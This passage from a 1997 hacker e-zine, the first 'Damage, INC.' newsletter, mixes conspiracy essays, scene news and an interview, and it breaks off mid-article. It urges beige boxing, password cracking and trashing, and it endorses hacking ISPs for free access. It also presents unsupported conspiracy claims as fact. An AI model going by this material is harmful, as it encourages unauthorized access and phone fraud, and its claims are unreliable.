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"The name speaks for itself!" ÞÝ
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Presents the
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Damage, INC. Newsletter
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September 1997 Issue #1
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"Knowledge is Power and Power is Damage, INC."
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ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
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C O N T E N T S :
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INTRODUCTION - A BRIEF INTRODUCTION TO THE FIRST DAMAGE, INC. NEWSLETTER.
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BIG BROTHER BASHING - GOVERNMENT CONTROL AND CORRUPTION IN OUR SOCIETY.
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Search String: {BIG BROTHER}
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CONSPIRACIES AND COVERUPS - THE GULF WAR SYNDROME COVERUP...EXPOSED.
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Search String: {COVERUPS}
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CORRUPTION AND GREED - BURGER KING AND HUDSON FOODS...A LETHAL COMBINATION.
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Search String: {GREED}
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H/P INFORMATION AND NEWS - MOTIVATIONAL NEOPHYTE BLURB.
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Search String: {NEWS}
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INTERVIEWS AND INTERROGATIONS - A SPECIAL INTERVIEW WITH THE JOURNALIST.
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Search String: {INTERVIEWS}
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OBJECTIVE OPINIONS - ONTARIO HYDRO...A MELTDOWN WAITING TO HAPPEN.
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Search String: {OPINIONS}
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REPORTS FROM THE FRONT - WINDOWS NT LIES.
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Search String: {REPORTS}
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SOURCE AND SCRIPTS - THE NWO TROJAN BY DAMAGE, INC.
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Search String: {SOURCE}
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THE JOURNALIST'S TOP TEN LIST - PRANKS TO PULL AT SCHOOL.
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Search String: {TOP TEN}
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CLOSING COMMENTS - BLACKENED'S EXPLOSIVE CLOSING COMMENTS.
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Search String: {CLOSING}
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INTRODUCTION: The Damage, INC. Newsletter was created for several important
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purposes. We want to use this medium as a weapon to fight the
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corruption that exists, reveal conspiracies and coverups, give
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useful information to those in the h/p scene. We hope that our
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articles are not only informative, but also interesting. If we
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can achieve our goals and make the Damage, INC. Newsletter an
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entertaining and thought provoking source of reading, then this
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great undertaking will be worthwhile. This is the first issue
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of what will become a monthly newsletter that is very unique.
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Everything that is written will contain the opinions expressed
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by members of Damage, INC. as well as writers that contribute
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articles that they've written. Integrity, honour and truth are
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very important to us. Thus, every aspect of the Damage, INC.
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Newsletter will reflect those strong beliefs. We cannot be
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bribed or bought off and we don't make deals with anyone. We
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aren't seeking fame, profit or anything else. Therefore, you
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can trust the unbiased, truthful words that are written here.
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Damage, INC. isn't affiliated with any other groups. The words
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that we speak are our own. Our word is more than just our
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reputation, it's everything to us. We want the Damage, INC.
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Newsletter to prove itself to be a reliable source of useful
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information. Of course, it's up to the readers to decide for s
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themselves whether or not they think what we release is quality.
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{BIG BROTHER} BASHING -
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Government Control and Corruption in our Society:
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If you have read the book 1984 by George Orwell, you will immediately
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recognize the phrase "Big Brother." You have to ask yourself then, how far
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is our current society from that state? I asked myself this exact question,
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and my answer? Not that far, if we continue on the way things are going.
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Canada is not as bad as the United States, but calling us "the 53rd
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state" is a pretty close comparison. And I must say, things have improved
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in the 1990's. Equal rights are an important social advancement, and I am
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glad to see a step in the right direction. All praise aside, I think its
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time to expose what's really going on...
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Supposedly we live in a "Democracy".
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HAHAHAHHAHAHAHA.
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I need convincing. Let's face it, "by the people, of the people, for the
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people" is a crock 'a' shit. Government looks out for government first, then
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the good of society. Ever heard of Watergate? It's just the biggest
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government coverup in the twentieth century. Ever wonder about the Vietnam
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War? Now why exactly did Washington send thousands of soldiers to kill
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millions of citizens? We can never know. Let me tell you about the Black
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Panthers - A radical negro rights group in the 1960's. The Local law
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enforcement gave them so much trouble, they eventually fell apart. Despite
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the fact that they broke no laws, hurt nobody, just wanted to be treated
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the same. And just how did "the man" control these outbreaks? They flooded
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the Ghetto with extremely pure, "china-white" heroine, at dirt-cheap prices.
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If you want proof, watch the news, any channel, at 6:00pm. Murder rate up
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7% since last year. "Just another homicide". It's no bullshit, the ghetto
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warzone was created by none-other than your local government.
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And then of course, there's the CiA LSD experiments in the 1960's.
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Making subjects stay up for 40 days at a time, tripped out 24/7. Asking
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themselves, "so, I wonder how much Acid this guy can take before he goes
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clinically insane." Nobody knew about these experiments though. The
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families were bought out, or threatened; the subjects themselves were all
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eventually admitted to mental institutions. It's scary.
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And these are just ones I'm thinking of off the top of my head. There
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are many more documented in books and film. Mel Gibson's latest flick
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"Conspiracy Theory" is Hollywood's way of showing the Film-going public what
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really goes on behind closed doors. Blackened talks about Government
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coverup in war-time situations in this issue.
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This is a taste of the current political situation. In every aspect,
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Politics has some underhanded connection in it. Whether it's kickbacks
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to the Mafia, or deals made with Hells Angels. From the health-inspector
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who takes bribes, to the Tax Auditor who embezzles funds, the fabric of our
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Government is woven with Fraud. Corruption is so heavily entrenched in
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the current political system, I believe things will not get better if we
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don't do something about it. The outcome if we don't???
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Collapse.
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Total and utter, political, economic, social collapse. But that is at the
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end. Because If we let things continue the way they are, you will be
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praying at night for the collapse. The end. Please God end this Hell.
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That will be your prayer. And they'll hear it. Because "they'll" have
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technology that can hear everything. One for each block. They'll justify
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it by claiming it reduces crime, being able to listen in on anybody, at
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any time. I heard the other day that private companies d/l all newsgroup
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and public messages from the internet, and log them. They keep massive
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storage/retrieval systems on every word that get's published on the news
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groups. How much do you want to bet that CIA or FBI search those databases
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for "suspicious" discussion? We'll never know.
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This newsletter is intended to open your eyes. This article was written
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in the hopes that you will not believe everything "your government" tells
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you. The way I see it, it's US against THEM.
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(c)1997 written by The Journalist 04/09/97
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CONSPIRACIES AND {COVERUPS} -
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THE GULF WAR SYNDROME COVERUP...EXPOSED:
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The Central Intelligence Agency (CIA), Department of Defense (DOD) and top
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brass of the American Military are all involved in an immense coverup. That
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includes the former President of the United States, George Bush. He was the
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Commander in Chief at the time of the Gulf War. Bush also happens to be an
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ex-CIA director. Former military leaders such as Colin Powell, Norman
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Schwartzkopf and possibly others were involved in the massive coverup as well.
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President Clinton has formed a committee that's supposed to investigate the
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"Gulf War Illness" but nothing productive will result from it. The proof is
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that one member has already been removed for trying to get CIA and DOD top
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secret documents de-classified to show that troops were exposed to chemical and
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biological weapons. Therefore, Bill Clinton is also part of the coverup since
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he has said and done nothing but setup a fixed commission. Clinton knows the
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truth but he isn't going to reveal it.
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According to an ex-CIA member, the Gulf War Syndrome was caused by chemical
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and biological weapons that American and other coalition troops were exposed
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to during the war. By his latest estimates, over 100,000 U.S. troops alone
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were affected and are still suffering. The CIA promptly fired him and tried
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to silence him by giving out his name, address, unlisted phone numbers and
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social security number.
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Saddam Hussein *did* unleash powerful chemical and biological weapons. In
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fact, some of the "harmless and inaccurate" SCUD missiles were armed with
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them. During some of the SCUD attacks, major damage was done and wasn't
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reported. As in, yellow rain (first used in Vietnam and Afghanistan by Russia)
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burned the skin of troops after a SCUD exploded near their location. Many
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areas were targets of these deadly, poisonous attacks. Saudi Arabia, Kuwait
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and certain areas of Iraq are all known to be places where troops saw and
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experienced strange things. For example, they were instructed to destroy
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thousands of bombs that were seized. Unfortunately, they weren't told to wear
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protective gas masks and clothing. They weren't warned of the dangers involved
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with destroying those types of weapons. Actually, they were told nothing but
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just expected to perform the duty and serve their country. Meanwhile, there
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were disposal trenches and vehicles outside the buildings that were marked
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Biological Hazard etc. Safe methods weren't used to dispose of the chemical
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and biological weapons though. That's the reason why thousands of soldiers
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are sick today, years after the conflict ended.
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The CIA's involvement is vast. They were directly involved and worked closely
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with the Department of Defense (DOD) to coverup the evidence and deny the fact
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that troops were exposed to any chemical or biological weapons. They even
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denied knowing anything about the situation. They claimed to have absolutely
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no knowledge about those weapons being used in the Gulf War. Meanwhile, they
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have documents that contradict their own statements. The CIA is a corrupt
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organization that is built upon lies and coverups. That's how they've done
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business throughout their entire history. Basically, the CIA is more concerned
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with their own interests than that of the people they are supposed to protect.
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They made deals with the Department of Defense. Meanwhile, that is a conflict
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of interest. The CIA should be keeping track of what the DOD does, instead of
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covering their negligent asses for them!
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Troops from many nations are still suffering from the Gulf War Syndrome. Many
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ground soldiers from the United Kingdom, France, Saudi Arabia and other
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countries have shown the same symptoms as American troops. They're being told
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by doctors at Veteran's hospitals that it is all in their heads. It is now
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September 1997 and still nobody will admit the truth about what actually
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occurred during the Gulf War. In order to cure the disease and illnesses caused
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by biological weapons, you must first know what troops were affected, where they
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were on duty, what weapons were involved in the attack or during the destruction
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process etc. Until that happens, soldiers that served their countries in the
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Gulf War will continue to suffer the severe lifelong consequences. Personally,
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I find it to be a sickening example of the extent that governments will go to
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coverup documented events. It's a real tragedy that has continued long after
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the actual battle has ceased. That's the real legacy of the Gulf War. So,
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before you think about the victory and laugh at the defeat of Iraq and Hussein,
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consider for a moment the conspiracy and great coverup in the aftermath.
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(C)opyright 1997 Written by Damage, INC.
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CORRUPTION AND {GREED} -
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BURGER KING AND HUDSON FOODS...A LETHAL COMBINATION:
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Burger King's main supplier was Hudson Foods (a huge American meat company that
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recently recalled millions of pounds of beef). Last week, Hudson Foods sold
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their Columbus, Nebraska plant to Tyson Foods. The processing plant was the
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main beef division for Hudson Foods. Recently, NBC's Dateline reported on
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the situation. They spoke with former Hudson employees, and were told several
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shocking stories describing the types of activities that went on at the plant.
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USDA (U.S. Department of Agriculture) inspection tags that pointed out problems
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with meat were *removed*, which is a criminal offence. Ground beef that fell
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onto the floor was used in the making of hamburger patties. "Keep production
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going!" was their only slogan. Greed and profit drove Hudson Foods to put
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the health of every customer at risk. They were so corrupt, the management
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forced employees to change reports that they'd written. In case you aren't
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aware, meat has to be transported, stored and shipped out after processing at
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a low temperature to prevent bacteria from growing. Well, Hudson Foods would
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not allow employees to record temperatures that were too high. Normally, meat
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should be kept at 34 degrees or lower. Meanwhile, meat at Hudson Foods was
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consistently above that...sometimes 44 degrees or even warmer. So, they'd tell
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the employees to probe for a cold spot. If that failed, they'd do anything to
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influence them into writing down a lower temperature. That can have deadly
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consequences. Former Hudson employees also reported that it was almost
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impossible to keep up with the demand from customers, mainly Burger King.
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This week, Burger King introduced a new hamburger called the "Big King" in an
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attempt to compete with McDonald's Big Mac. Who is their new supplier? How
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are they going to be able to supply even more hamburgers to Burger King? Can
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we trust the food that we pay for and consume? As customers of fast food
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chains, should we question whether or not the food is tainted and contaminated?
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Is there any type of protection in place to safeguard consumers? Have you ever
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heard the term E. Coli used before? If not, continue to read this article and
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Damage, INC. will educate you by giving you the cold, harsh facts.
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FOOD RADIATION:
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After Hudson Foods tainted beef scandal has been exposed, there is a renewed
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interest in food radiation. When food is irradiated, supposedly any E. Coli,
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Salmonella and other micro-organisms in the food product are killed. Instead
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of using good meat handling practices, the quick and easy way out is food
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radiation. The term "radiation" conjures up all kinds of images. To readers
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that haven't heard of E. Coli, it's a lethal form of bacteria that is common in
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animal and human waste.
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According to a scientist interviewed on CBC Radio, food has been irradiated
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for over 40 years, and is a common practice in 40 countries. The scientist
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also claimed that the United States and Canada use the technology in a limited
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capacity. They supposedly only irradiate imports from other countries like
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tropical fruits, spices, etc. I seriously doubt that. I believe they also
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irradiate domestic foods in Canada and I'll stand by those words.
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The World Health Organization, and the American Medical Association have
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already endorsed the practice of food radiation. However, the DOA (Department
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of Agriculture and FDA (Food and Drug Administration) are stalling because of
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what is viewed as "the public's notion that radiation is harmful... that they
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are fearful of the word radiation." The FDA commented that the practice would
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be unacceptable to consumers because of their fear. Why should we trust them?
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Do you want to ingest food that's been radiated? I definitely don't. During
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the 1950s atomic bomb tests, scientists claimed radiation levels were safe
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enough for American troops to be directly exposed to at close range. Should
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we now believe that food radiation is completely safe? Haha! Radiation can be
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a deadly weapon. Don't be naive. Don't allow them to brainwash you by saying
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that it isn't harmful. How could radiation be good for you? What's next?
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Perhaps they'll want to add poison to our food supply in order to kill other
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forms of bacteria.
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The main purpose of the technology is to kill any molds and funguses that
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are in the food product. (Should moldy meat be used in the first place?)
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Setting up the technology is expensive, but the scientist claimed that most of
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the big meat packers could easily afford it. Hudson Foods could've easily
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afforded it, since they would bus in homeless drug addicts from New York City
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and Mexican immigrants to work at their meat processing plant. Now that's what
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I call a cheap labour force. Can employees such as that be trusted to handle
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food properly? I think not. They didn't even test meat in the plant's lab.
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They used the excuse of being too overloaded with orders from Burger King. At
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any rate, food radiation shouldn't be the solution. It's all about greed and
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making huge profits. Food safety is the last priority and totally ignored.
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The food radiation process is as follows:
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First, the meat is examined with all of the current methods. Second, the
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meat is cleaned, and processed (cut into retail cuts of meat, packaged,
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etc.). Then they are dropped onto a conveyor belt and sent to a "shielded"
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part of the plant. The food is then exposed to intense gamma rays. That is
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correct, gamma rays. The same gamma rays that turned the Incredible Hulk
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green! The process takes time, so the meat is exposed more than just a few
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seconds. The gamma radiation supposedly breaks down the DNA of the offending
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micro-organism, rendering it unable to reproduce. When the life cycle of
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the existing micro-organism has ended, the scientist said that the offending
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organism (like E. Coli) is gone, unless the meat is put into conditions where
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the micro-organism thrives. In other words, the meat can still become tainted
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if it's improperly handled and stored at the wrong temperature. What happens
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if it's exposed to gamma rays for an extended duration? The workers are bound
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to make mistakes and errors always happen eventually.
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NBC and CNN interviewed farmers that supplied Hudson Foods with beef. They
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admitted on television that they feed their cattle chicken shit, sawdust,
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dead dogs, cats and wild animals (roadkill) that they find on the side of the
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road near their farms. Basically, their feed consists of *anything* except
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grain. Burger King has yet to disclose the name of their new meat supplier.
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I wonder why? Yet, they've started an advertising blitz for the "Big King"
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burger to divert the media attention away. It's business as usual for that
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fat cat corporation. As the saying goes, shit in and shit out. If you feed
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the cattle chicken shit, what do you think the burgers are going to contain?
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Their famous Whopper should really be called a Plopper. Haha. If you want to
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eat shit and die, have it your way right away at "Burger" King. The next time
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you're at Shit King... standing at the counter and ready to order...do yourself
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a big favour and think about this article. ;) As a consumer, you have to be
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responsible for your own health and protection. Don't believe, trust and rely
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on the government or any fat cat companies. They're greedy, corrupt and don't
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care how many people become sick and die from E. Coli etc.
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(C)opyright 1997 Written by Damage, INC.
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H/P INFORMATION AND {NEWS} -
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Motivational Neophyte Blurb...
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So obviously you're reading this because you want something more out of
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the (519) BBS scene. Warez just don't do it for you. Play one game, you've
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played them all right?. Plus, you can't really put "I played a lot of pirated
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video games" on your resume now can you?.
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My name is The Journalist. I have been BBS'ing for over 4 years. Not
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that long, but longer than most. I have watched the quality of users and
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BBS's deteriorate like a snowman on a sunny day. I'm not saying things are
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lame now. Far from it. There just seems to be a major lack of leaders.
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You know, people like me :) People who go out of their way to make BBS-Land
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a better place. Now, what I'm saying here is, things are gonna change
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around here. Not because I say so, but because *you* want them to. C'mon,
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can you say that you have experienced the thrill of beige boxing? The
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satisfaction of breaking a password? These things are still entirely
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possible. One comment I hear all too often is "... but all those text files
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are written for like 20 years ago." BULLSHIT! It's just a little harder
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because now you have to sift through the shit to get the good stuff. I'll
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tell you now, most boxes don't work, because The phone company got wise and
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made it harder to get free calls. But that doesn't mean shit. Go to a bell
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office, and do some trashing. You might find some interesting stuff,
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you might not. But it was fun right?
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One point I want to get across is that the h/p scene has evolved.
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Not anymore is it just about getting an extender or hacking a system.
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It's about being on the frontier of the information age.
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Think about that.
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The *information* age. We are living one of the biggest revolutions of our
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time. The Internet? Think about what you imagine the internet will be
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in 10 years? Think about how in history class, one of the projects will be
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"the history of the internet" We are living it baby, and once you realize
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this, you understand the importance of preserving free speech, and
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condemning censorship. (all you internet-porn-kings! :))
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The conclusion is this... Welcome to the future of H/P/A/C/V
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(c)1997 written by The Journalist 04/09/97
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It's 11 o'clock... Do you know where your hard drive is? ;) This is the
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local h/p news section. The state of the group ati (access to information)
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is now in question. The ati web page lasted mere weeks and is no longer up.
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The Crypt (ati's whq) wasn't online for the entire summer and ati_net was
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basically dead. Not only that, tck disappeared into the abyss and wasn't seen
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on any local h/p boards...until recently when he resurfaced. This commentary
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isn't meant to bash ati. I'm just reporting the news as it exists and stating
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the facts. The main point is that ati is inactive and hasn't released anything
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since May 1997. Is it the beginning and the end for ati? Will tck resurrect
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the group? I'm not going to draw any conclusions. We'll just have to wait and
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see what develops.
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{INTERVIEWS} AND INTERROGATIONS -
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A SPECIAL INTERVIEW WITH THE JOURNALIST:
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The following text is a recent interview that BLACKENED conducted on FoI with
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the newest member of Damage, INC.
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-B is BLACKENED
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-TJ is The Journalist
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Introduce yourself to the readers of the Damage, INC. Newsletter. -B
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If you don't know me already, I run a h/p support board in (519). I have
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been in the bbs scene for a long time, and many will know me as a creative
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and innovative thinker :) -TJ
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What made you become interested in the whole h/p scene? -B
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Hmm... that's a good question Blackened. I would have to say it started a
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few years back when I came across some txt files on The Digital Network. I
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had a 2400 at the time, and Text files were easy to get. I started reading
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about hacking, and more of the anarchy, (ripping off pop machines and the
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like :)) Basically it snowballed from there. I found other h/p boards in the
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area, and started calling LD to &TOTSE and other famous sites. The rest as
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they say is history. -TJ
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;) After that, why did you decide to start FoI and run your own board? -B
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Well I think a small history is needed here, because I decided to run a board
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pretty soon after I started bbs'ing. I started as a PD board. And
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progressed to Warez (under the bbs ICE COLD :)) When I realized how pointless
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warez were, I decided to convert over to h/p, which has been one of the best
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decisions I ever made. h/p has always had a small following, and I guess I
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hoped that running FoI would attract otherwise warez geeks to a more
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fulfilling interest. -TJ
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How long has FoI been online and supporting h/p now? -B
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I would have to say about 18 months give or take 5 years :) hehe no,
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probably 18 months to 2 years. -TJ
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That's cool. Would you describe FoI as being more h/p related or general
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information and ideas? -B
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umm.. let me think about that one. For those who have bravely ventured thru
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the file bases of FoI, I'm sure you'll note the diversity of files online.
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I like to have h/p as the focus, but let's face it, sometimes you just want
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to read about something other than hacking UNIX or such. FoI is based on
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Information - regardless of topic. -TJ
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For those that haven't called FoI that might be reading this newsletter, what
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reason would you give for them to call your board? -B
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hehee :) a sales ad eh? No, FoI is different. If you are sick of warez, or
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sick of certain people in the warez scene, you should call FoI. If you are
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haunted by the corruption in our current political system, you should call
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FoI. If you like the idea of taking advantage of the big corporations (Bell,
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etc) you should call FoI. There is something for everyone at FoI. Except
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maybe the pups. -TJ
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Now that you've discussed FoI a little and described it to our readers, I'd
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like to ask you what difference you think being a Damage, INC. Member and FoI
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being the new Damage, INC. Dist. Site will make (to yourself, FoI and 519)? -B
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I expect Damage, INC. will boost user interest in FoI. For myself, Damage,
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INC. represents an organization where the member's interests are the same as
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my own. It is very rewarding. I know I will learn new things by being a
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part of Damage, INC. And I know for a fact that an FoI/Damage, INC.
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Combination will have a strong, positive effect on the diminishing (519)
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scene. -TJ
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How do you think the Damage, INC. Newsletter and interviews such as this one
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will affect the local h/p scene? -B
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By providing local, up-to-date information and support, the Damage, INC.
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Newsletter will open a lot of users eyes to a more intelligent way of
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bbs'ing. We constantly refer to this as a "revolution", and I
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whole-heartedly believe the Damage, INC. Newsletter can continue to provide
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unbiased, useful information, thus resulting in a more enlightened h/p scene
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with much more activity. -TJ
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Do you know of any other local h/p groups? -B
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Not as of yet, but I expect to see many "wannabees" pop up trying to imitate
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us. Damage, INC. and FoI are the foundation of the h/p scene in (519),
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simply because of our long standing presence in the community. We demand
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respect, we get respect, because of a stability not found in most other
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groups. (Commenting on the recent Sike dismemberment, and other groups which
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could not make it). All the power to any other h/p groups that start, and
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I myself will fully support any groups, but only if they appear solid, and
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interested. -TJ
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That's an excellent answer. Now to a more personal question. Have you ever
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been idolized and "worshipped" by any local users that are new to the h/p
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scene? If so, is it something that you dislike? -B
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hehehe, well which hacker hasn't been idolized by Blade Runner <g> but that's
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not a bash. In the past many inexperienced users have been at awe over my
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knowledge of h/p and related topics, and I tend not to really care if they go
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overboard a little :) This is such a new, changing way of bbs'ing that I
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like to help people where I can. -TJ
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Haha. ;) I've had my own experiences with Blade Runner. Anyways, you've
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done so much to spread information and educate the users that call FoI, but
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is it ever tiresome to be asked lame questions such as "How do I build a
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beige box?" or "How do I hack....whatever?" by users? In essence, I want to
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know if it becomes annoying to be asked questions about information that's
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already online and available on FoI. -B
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Exactly, Blackened. Honestly? It's insulting. I go through all the time and
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effort to get files online, make sure all files have descriptions, so when a
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newbie asks me such a question I usually have 4 letters for him - RTFM -TJ
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There's been so much debate recently about bbsing, the internet etc. as it
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relates to the overall h/p scene. Do you think there's anything wrong with
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quality h/p web sites? Or, do you believe that the h/p scene should remain
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on a smaller scale... with boards and users that "know each other"? -B
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That is a monumental question, and I'm sure you don't want me to type pages
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of my opinion :)... hehe, I have thought a lot about the internet's effect on
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the bbs scene, and I'm saddened to watch something I've grown to love slowly
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diminish into the shadows of the Internet. I came to the realization
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recently though, that this is simply because we're letting it rot away. Its
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time to take back the streets. Well, bad terminology, but i have nothing
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against the Internet, in fact many of the files on FoI come from the Net.
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Its a great source of information, but it can never compare to the intimacy
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of a well-run bulletin board system. -TJ
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I completely agree with that. The internet is good for distribution, but
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doesn't have the same feeling as boards. On the other hand, I think it's
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good for distribution purposes. So, do you think Damage, INC. should setup
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it's own web site in the future for world wide distribution? (at the same
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time continue to support boards such as FoI). -B
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Absolutely. We will have the best of both worlds. -TJ
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Now that we've discussed the internet etc. what future plans do you have in
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store for FoI? How do you think boards will change in the next 5 years? ;)
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-B
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ahh, that is a very interesting question that I have not given that much
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thought to. I think we will see a merge of the bbs scene and the internet
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in the 21st century. Each medium complements each-other, and I like to use
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this analogy - the bbs scene is like a small village. The internet is NY
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City. The two places are worlds apart, but must somehow live together in
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harmony. To accomplish this, some laws are set by the "big guy", and others
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are allowed to be defined by each individual community/village. If you
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understand what I'm saying, then good, but if not, then that's understandable
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because that was kinda cryptic :) -TJ
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I do, but I can't speak for the readers. It's nearing the end of 1997, do
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you think the future of h/p is a bright or dismal one? Also, do you have
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faith in the new people entering the h/p scene? Is there any hope that
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they'll learn and help to evolve and progress h/p? -B
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They say there's no such thing as a problem child, its a "problem-parent."
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Its up to you, me, and the person reading this right now to make sure we
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teach our own h/p values, and ways of thinking to the younger generation.
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That means, the future of h/p rests on our shoulder's right now. If Damage,
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INC. and FoI went down right now, the h/p scene would die. Its the truth.
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But I look on the bbs's I'm on, and *most* do have an earnest H/P/A/C/T/V
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section. This pleases me, so I think yes, there is hope. The next
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generation of h/p'ers are going to be entering the dawn of a millennium. I'm
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sure they'll know what to do. -TJ
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On the same note, do you agree with warez boards trying to be wannabe h/p
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boards? As in, most of their file areas are filled with warez... while they
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also try to support h/p by having a single file area? -B
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Pirated software originated with the same intentions as h/p. Hackers who
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were broke exchanging useful software to continue their search for the truth.
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Now it seems that has been forgotten, and the 0-2 day warez race is
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dominating the warez culture. Warez culture has gone to shit, and I want
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h/p to have nothing to do with it. -TJ
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I agree with that. Here's another interesting question... How do you feel
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about newsletters and magazines that charge money for a subscription? As you
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already know, the Damage, INC. Newsletter is totally free. Personally,
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that's something that I believe in strongly. The spread of h/p information
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shouldn't cost the users that want to learn. Do you agree or disagree with
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that statement? -B
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The best things in life are free - that's all I have to say. -TJ
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Would you ever pay to call a h/p board? -B
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Not if I can get the exact same thing for free somewhere else. No I would
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not pay for a h/p board. -TJ
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Okay, now that we've discussed the "pay for access" aspect of h/p boards etc.
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I'd like to ask you a question about ethics. If you had the knowledge to
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hack "fictional software", and a user offered to pay you to hack a board
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running under that software... would you become a hacker for hire? ;) -B
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Wow!, that's a doozy of a question :) I hope I can say that I would not
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"sell-out" but people do desperate things in desperate times. How much
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money are we talking about, and what kind of hack does he want? -TJ
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Let's say $50 as an example, and the user/customer wants you to hack the
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system and provide him with the userfile and any passwords necessary to allow
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them to logon under Sysop access. -B
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Hmmm... I would promptly tell him to Fuck off. -TJ
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;) That's a good answer, and I applaud you for having the proper ethics. I
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won't mention any names, but this area is famous for "phreaks" that try to
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sell extenders, pbxs, other codes. -B
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Can I mention a name? :) -TJ
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That's your choice... -B
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hehe... Well its interesting because I once paid this same guy $20 for a
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voicemail box 1800 system a few years back. So that kinda contradicts my
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answer previously on paying for stuff, but lets just say LL is the most I'll
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give out. -TJ
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Okay, that's fair enough. Do you think it's right for people to be selling
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codes, internet accounts etc. in order to make profit from the h/p scene (and
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take advantage of naive users that are new to the scene)? -B
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No comment. -TJ
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Okay... Do you think Damage, INC. should ever sell information such as codes,
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accounts etc.? -B
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No. As long as I am part of that organization, I would not feel comfortable
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selling pwords, codes etc. I *honestly* must say though, I know its hard to
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turn down $20 or $50 when its handed to you like that, and I don't want to
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seem like some "perfect" h/p'er because that would be more damaging, than to
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admit I am human, and sometimes make mistakes. -TJ
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Yes, we're all flawed. Personally, I've been offered money ($50 and more),
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but always turned it down in order to maintain my own credibility. ;) The
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main reason I asked though, was because I believe if you sell codes and other
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information... then you aren't teaching the person anything. That is, other
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than they can just "buy anything" they want instead of experimenting and
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learning by reading etc. I don't know of any perfect h/p'er, but I think
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that our motives are honest and noble. What benefit do you think the Damage,
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INC. Newsletter will have to this area after it's been in publication for a
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few years? -B
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Just to say, you just pinned the tail on the donkey man. Look at the bible,
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(and although I don't believe in Christianity, I *do* believe Jesus existed).
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"Give a man a fish, feed him for a day, *Teach* a man how to fish, feed him
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for a lifetime." -TJ
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Yes, that's exactly what I was trying to express. ;) -B
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And to comment on your second question; I have no doubt, those who become
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dedicated readers of the Damage, INC. Newsletter will feel a fullness enter
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into their lives, never experienced before. I feel it is important to stress
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that while Damage, INC. does focus attention on Hacking & Phreaking; It also
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takes a look at society from a whole new perspective, which is beneficial to
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anyone who sees that way as a result of reading our articles. -TJ
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Do you think it's a good idea for this newsletter to include articles that
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were written by people that aren't associated with Damage, INC. (as long as
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they are given full credit)? -B
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Umm, that would depend on the situation really. At work I clipped out a
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newspaper article from <guiltily> "The SUN" which looked at Di's death from a
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"conspiracy" point of view. It totally enlightened me to the fact that any
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situation always has two or more sides, and to be objective, you have to try
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and see things from that "other" perspective ;) -TJ
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Good point. I want to change the topic to trojans now. How do you feel about
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the debug script for NWO being included in this issue? -B
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I think it is a provocative move, and will certainly stir up the bbs scene
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with a big plastic spoon. The outcome of releasing it can only be left up to
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my imagination, but attention is a positive thing right now, and I see no
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harm in including it. -TJ
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Haha (if it stirs things up, that's cool with me). Do you think it's a good
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idea to include source and scripts for viruses, trojans and utilities in the
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future issues? -B
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Only to teach readers something new so that they can one day make their own
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viruses/virii :) I know from personal experience that looking at someone
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else's code accelerates the learning process greatly. Especially if that code
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is explained, line by line. -TJ
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Yes, whatever source code we include should *always* be used as a learning
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tool by our readers. There's been debate for years about hacking for
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information/hacking and doing damage. What's your opinion? This is the
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final question. I hope you've enjoyed doing this interview. If you have any
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other comments to make, feel free to write them. ;) -B
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:) Okay. Well to answer your initial question; and this is also a note to
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interested readers, I learnt a lot of information for books such as hmmm bad
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memory, Hacker Crackdown was one, and other various text files on Hackers
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such as Phiber Optik, The Fry Guy (a very controversial case that one) and
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Captain Crunch. There was a certain code of ethics that was very plain and
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simple, but has been cast aside today. It is this : hacking is to learn
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only. Hacking a system is to gain some new knowledge about the o/s or
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computer. If a hacker modifies or deletes files in any way, they cross a
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boundary in which Hacking becomes unethical. This is why hacking has gotten
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such a bad name, because it causes damage. -TJ
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In your opinion though, is it okay to hack an ISP, borrow accounts, use the
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internet for free? (without doing any damage to any systems)? -B
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Yes, what about you? -TJ
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Yes, I think that's fine... since it should be free. ;) Any other comments?
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- B
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nope -TJ
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Okay. Thanks for sharing your thoughts and agreeing to do this interview.
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It's the first of many that'll be included in the Damage, INC. Newsletter.
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Hopefully, the readers have benefitted by reading this interview... and will
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consider what was said here. -B
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That is all I hope too Blackened. I want to make it clear that my purpose is
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to be service to neophyte h/p'ers who are genuinely interested to learn. I
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will do my best to help anyone who asks my advice. This also includes FoI
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Archives at 519-846-8598. Thanks Blackened, this has been fun :) -TJ
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Thanks again The Journalist. And to our readers, just remember that you could
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also be featured in one of my interviews in the future. ;) -B
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OBJECTIVE {OPINIONS} -
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ONTARIO HYDRO...A MELTDOWN WAITING TO HAPPEN:
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The calamity at Ontario Hydro should have received more media attention than
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it did. The general media did not cover the consequences of Hydro's
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deteriorating nuclear reactors. That is what premier Mike Harris and the
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fat cat executives at Ontario Hydro counted on. This newsletter is the
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perfect forum to look into this issue further. Be sure to read the following
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facts and objective opinions, and then formulate your own. Being an informed
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person will help you to see through the government's lies and coverups.
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After intense public pressure, and a scathing 60-page study by the Atomic
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Energy Control Board, Ontario Hydro's gross inefficiency has been fully
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exposed. Hydro's president and CEO, Allan Kupcis couldn't resign fast enough
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after it was announced that seven of Ontario's 19 operating nuclear reactors
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will supposedly be shut down.
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Carl Andognini, leader of the seven member team that wrote the report
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concluded that many of Hydro's problems were rooted with people rather than
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nuclear technology. In Andognini's words, Hydro's management acted like a
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"feudal fiefdom without professional standards, managerial expertise or, above
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all, accountability." In my words, Hydro's management acted like all the
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other government-controlled monopolies. Hydro has a reported $17.6 billion
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invested in their plants. All they have to show for it are worn-out reactors
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that have been leaking various chemicals (most recently deuterium oxide) for
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nearly two decades. Andognini also reports that Hydro has "minimally
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acceptable" or "below industry standards" when it comes to normal
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operations or being prepared for an emergency, such as a meltdown.
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Rocked by being exposed by the truth, officials are desperately trying to
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keep the big fat boat afloat. Hydro has convinced Andognini to join them.
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He claims he will start initiating the recommendations in his report.
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Andogini has promised to remain for 3« years. He is optimistic that he can
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turn the nuclear division around. Three coal and oil-fired generating plants
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have been reactivated. They will make up for the power loss that will be
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caused by the dormant reactors.
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During its years as a government-controlled monopoly, Hydro has accrued a
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huge debt. The Ontario government has guaranteed $24 billion of Hydro's
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debt. Upgrade costs for an additional 12 reactors will cost Ontario
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taypayers an estimated $3.6 billion now, and $5.8 billion over the next
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four years. Of course costs will mostly likely be much more, since those
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estimates come from the Ontario government. One additional cost that Hydro
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didn't include is the cost of shutting down seven reactors (four at the
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Pickering plant, three at the Bruce plant) over the span of a 30 year period.
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Plus the closed plants will have to be staffed to monitor radiation levels.
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The fate of Ontario Hydro is still unfolding. Ontario premier Mike Harris
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has been sitting on his hands, unwilling to give up the government's
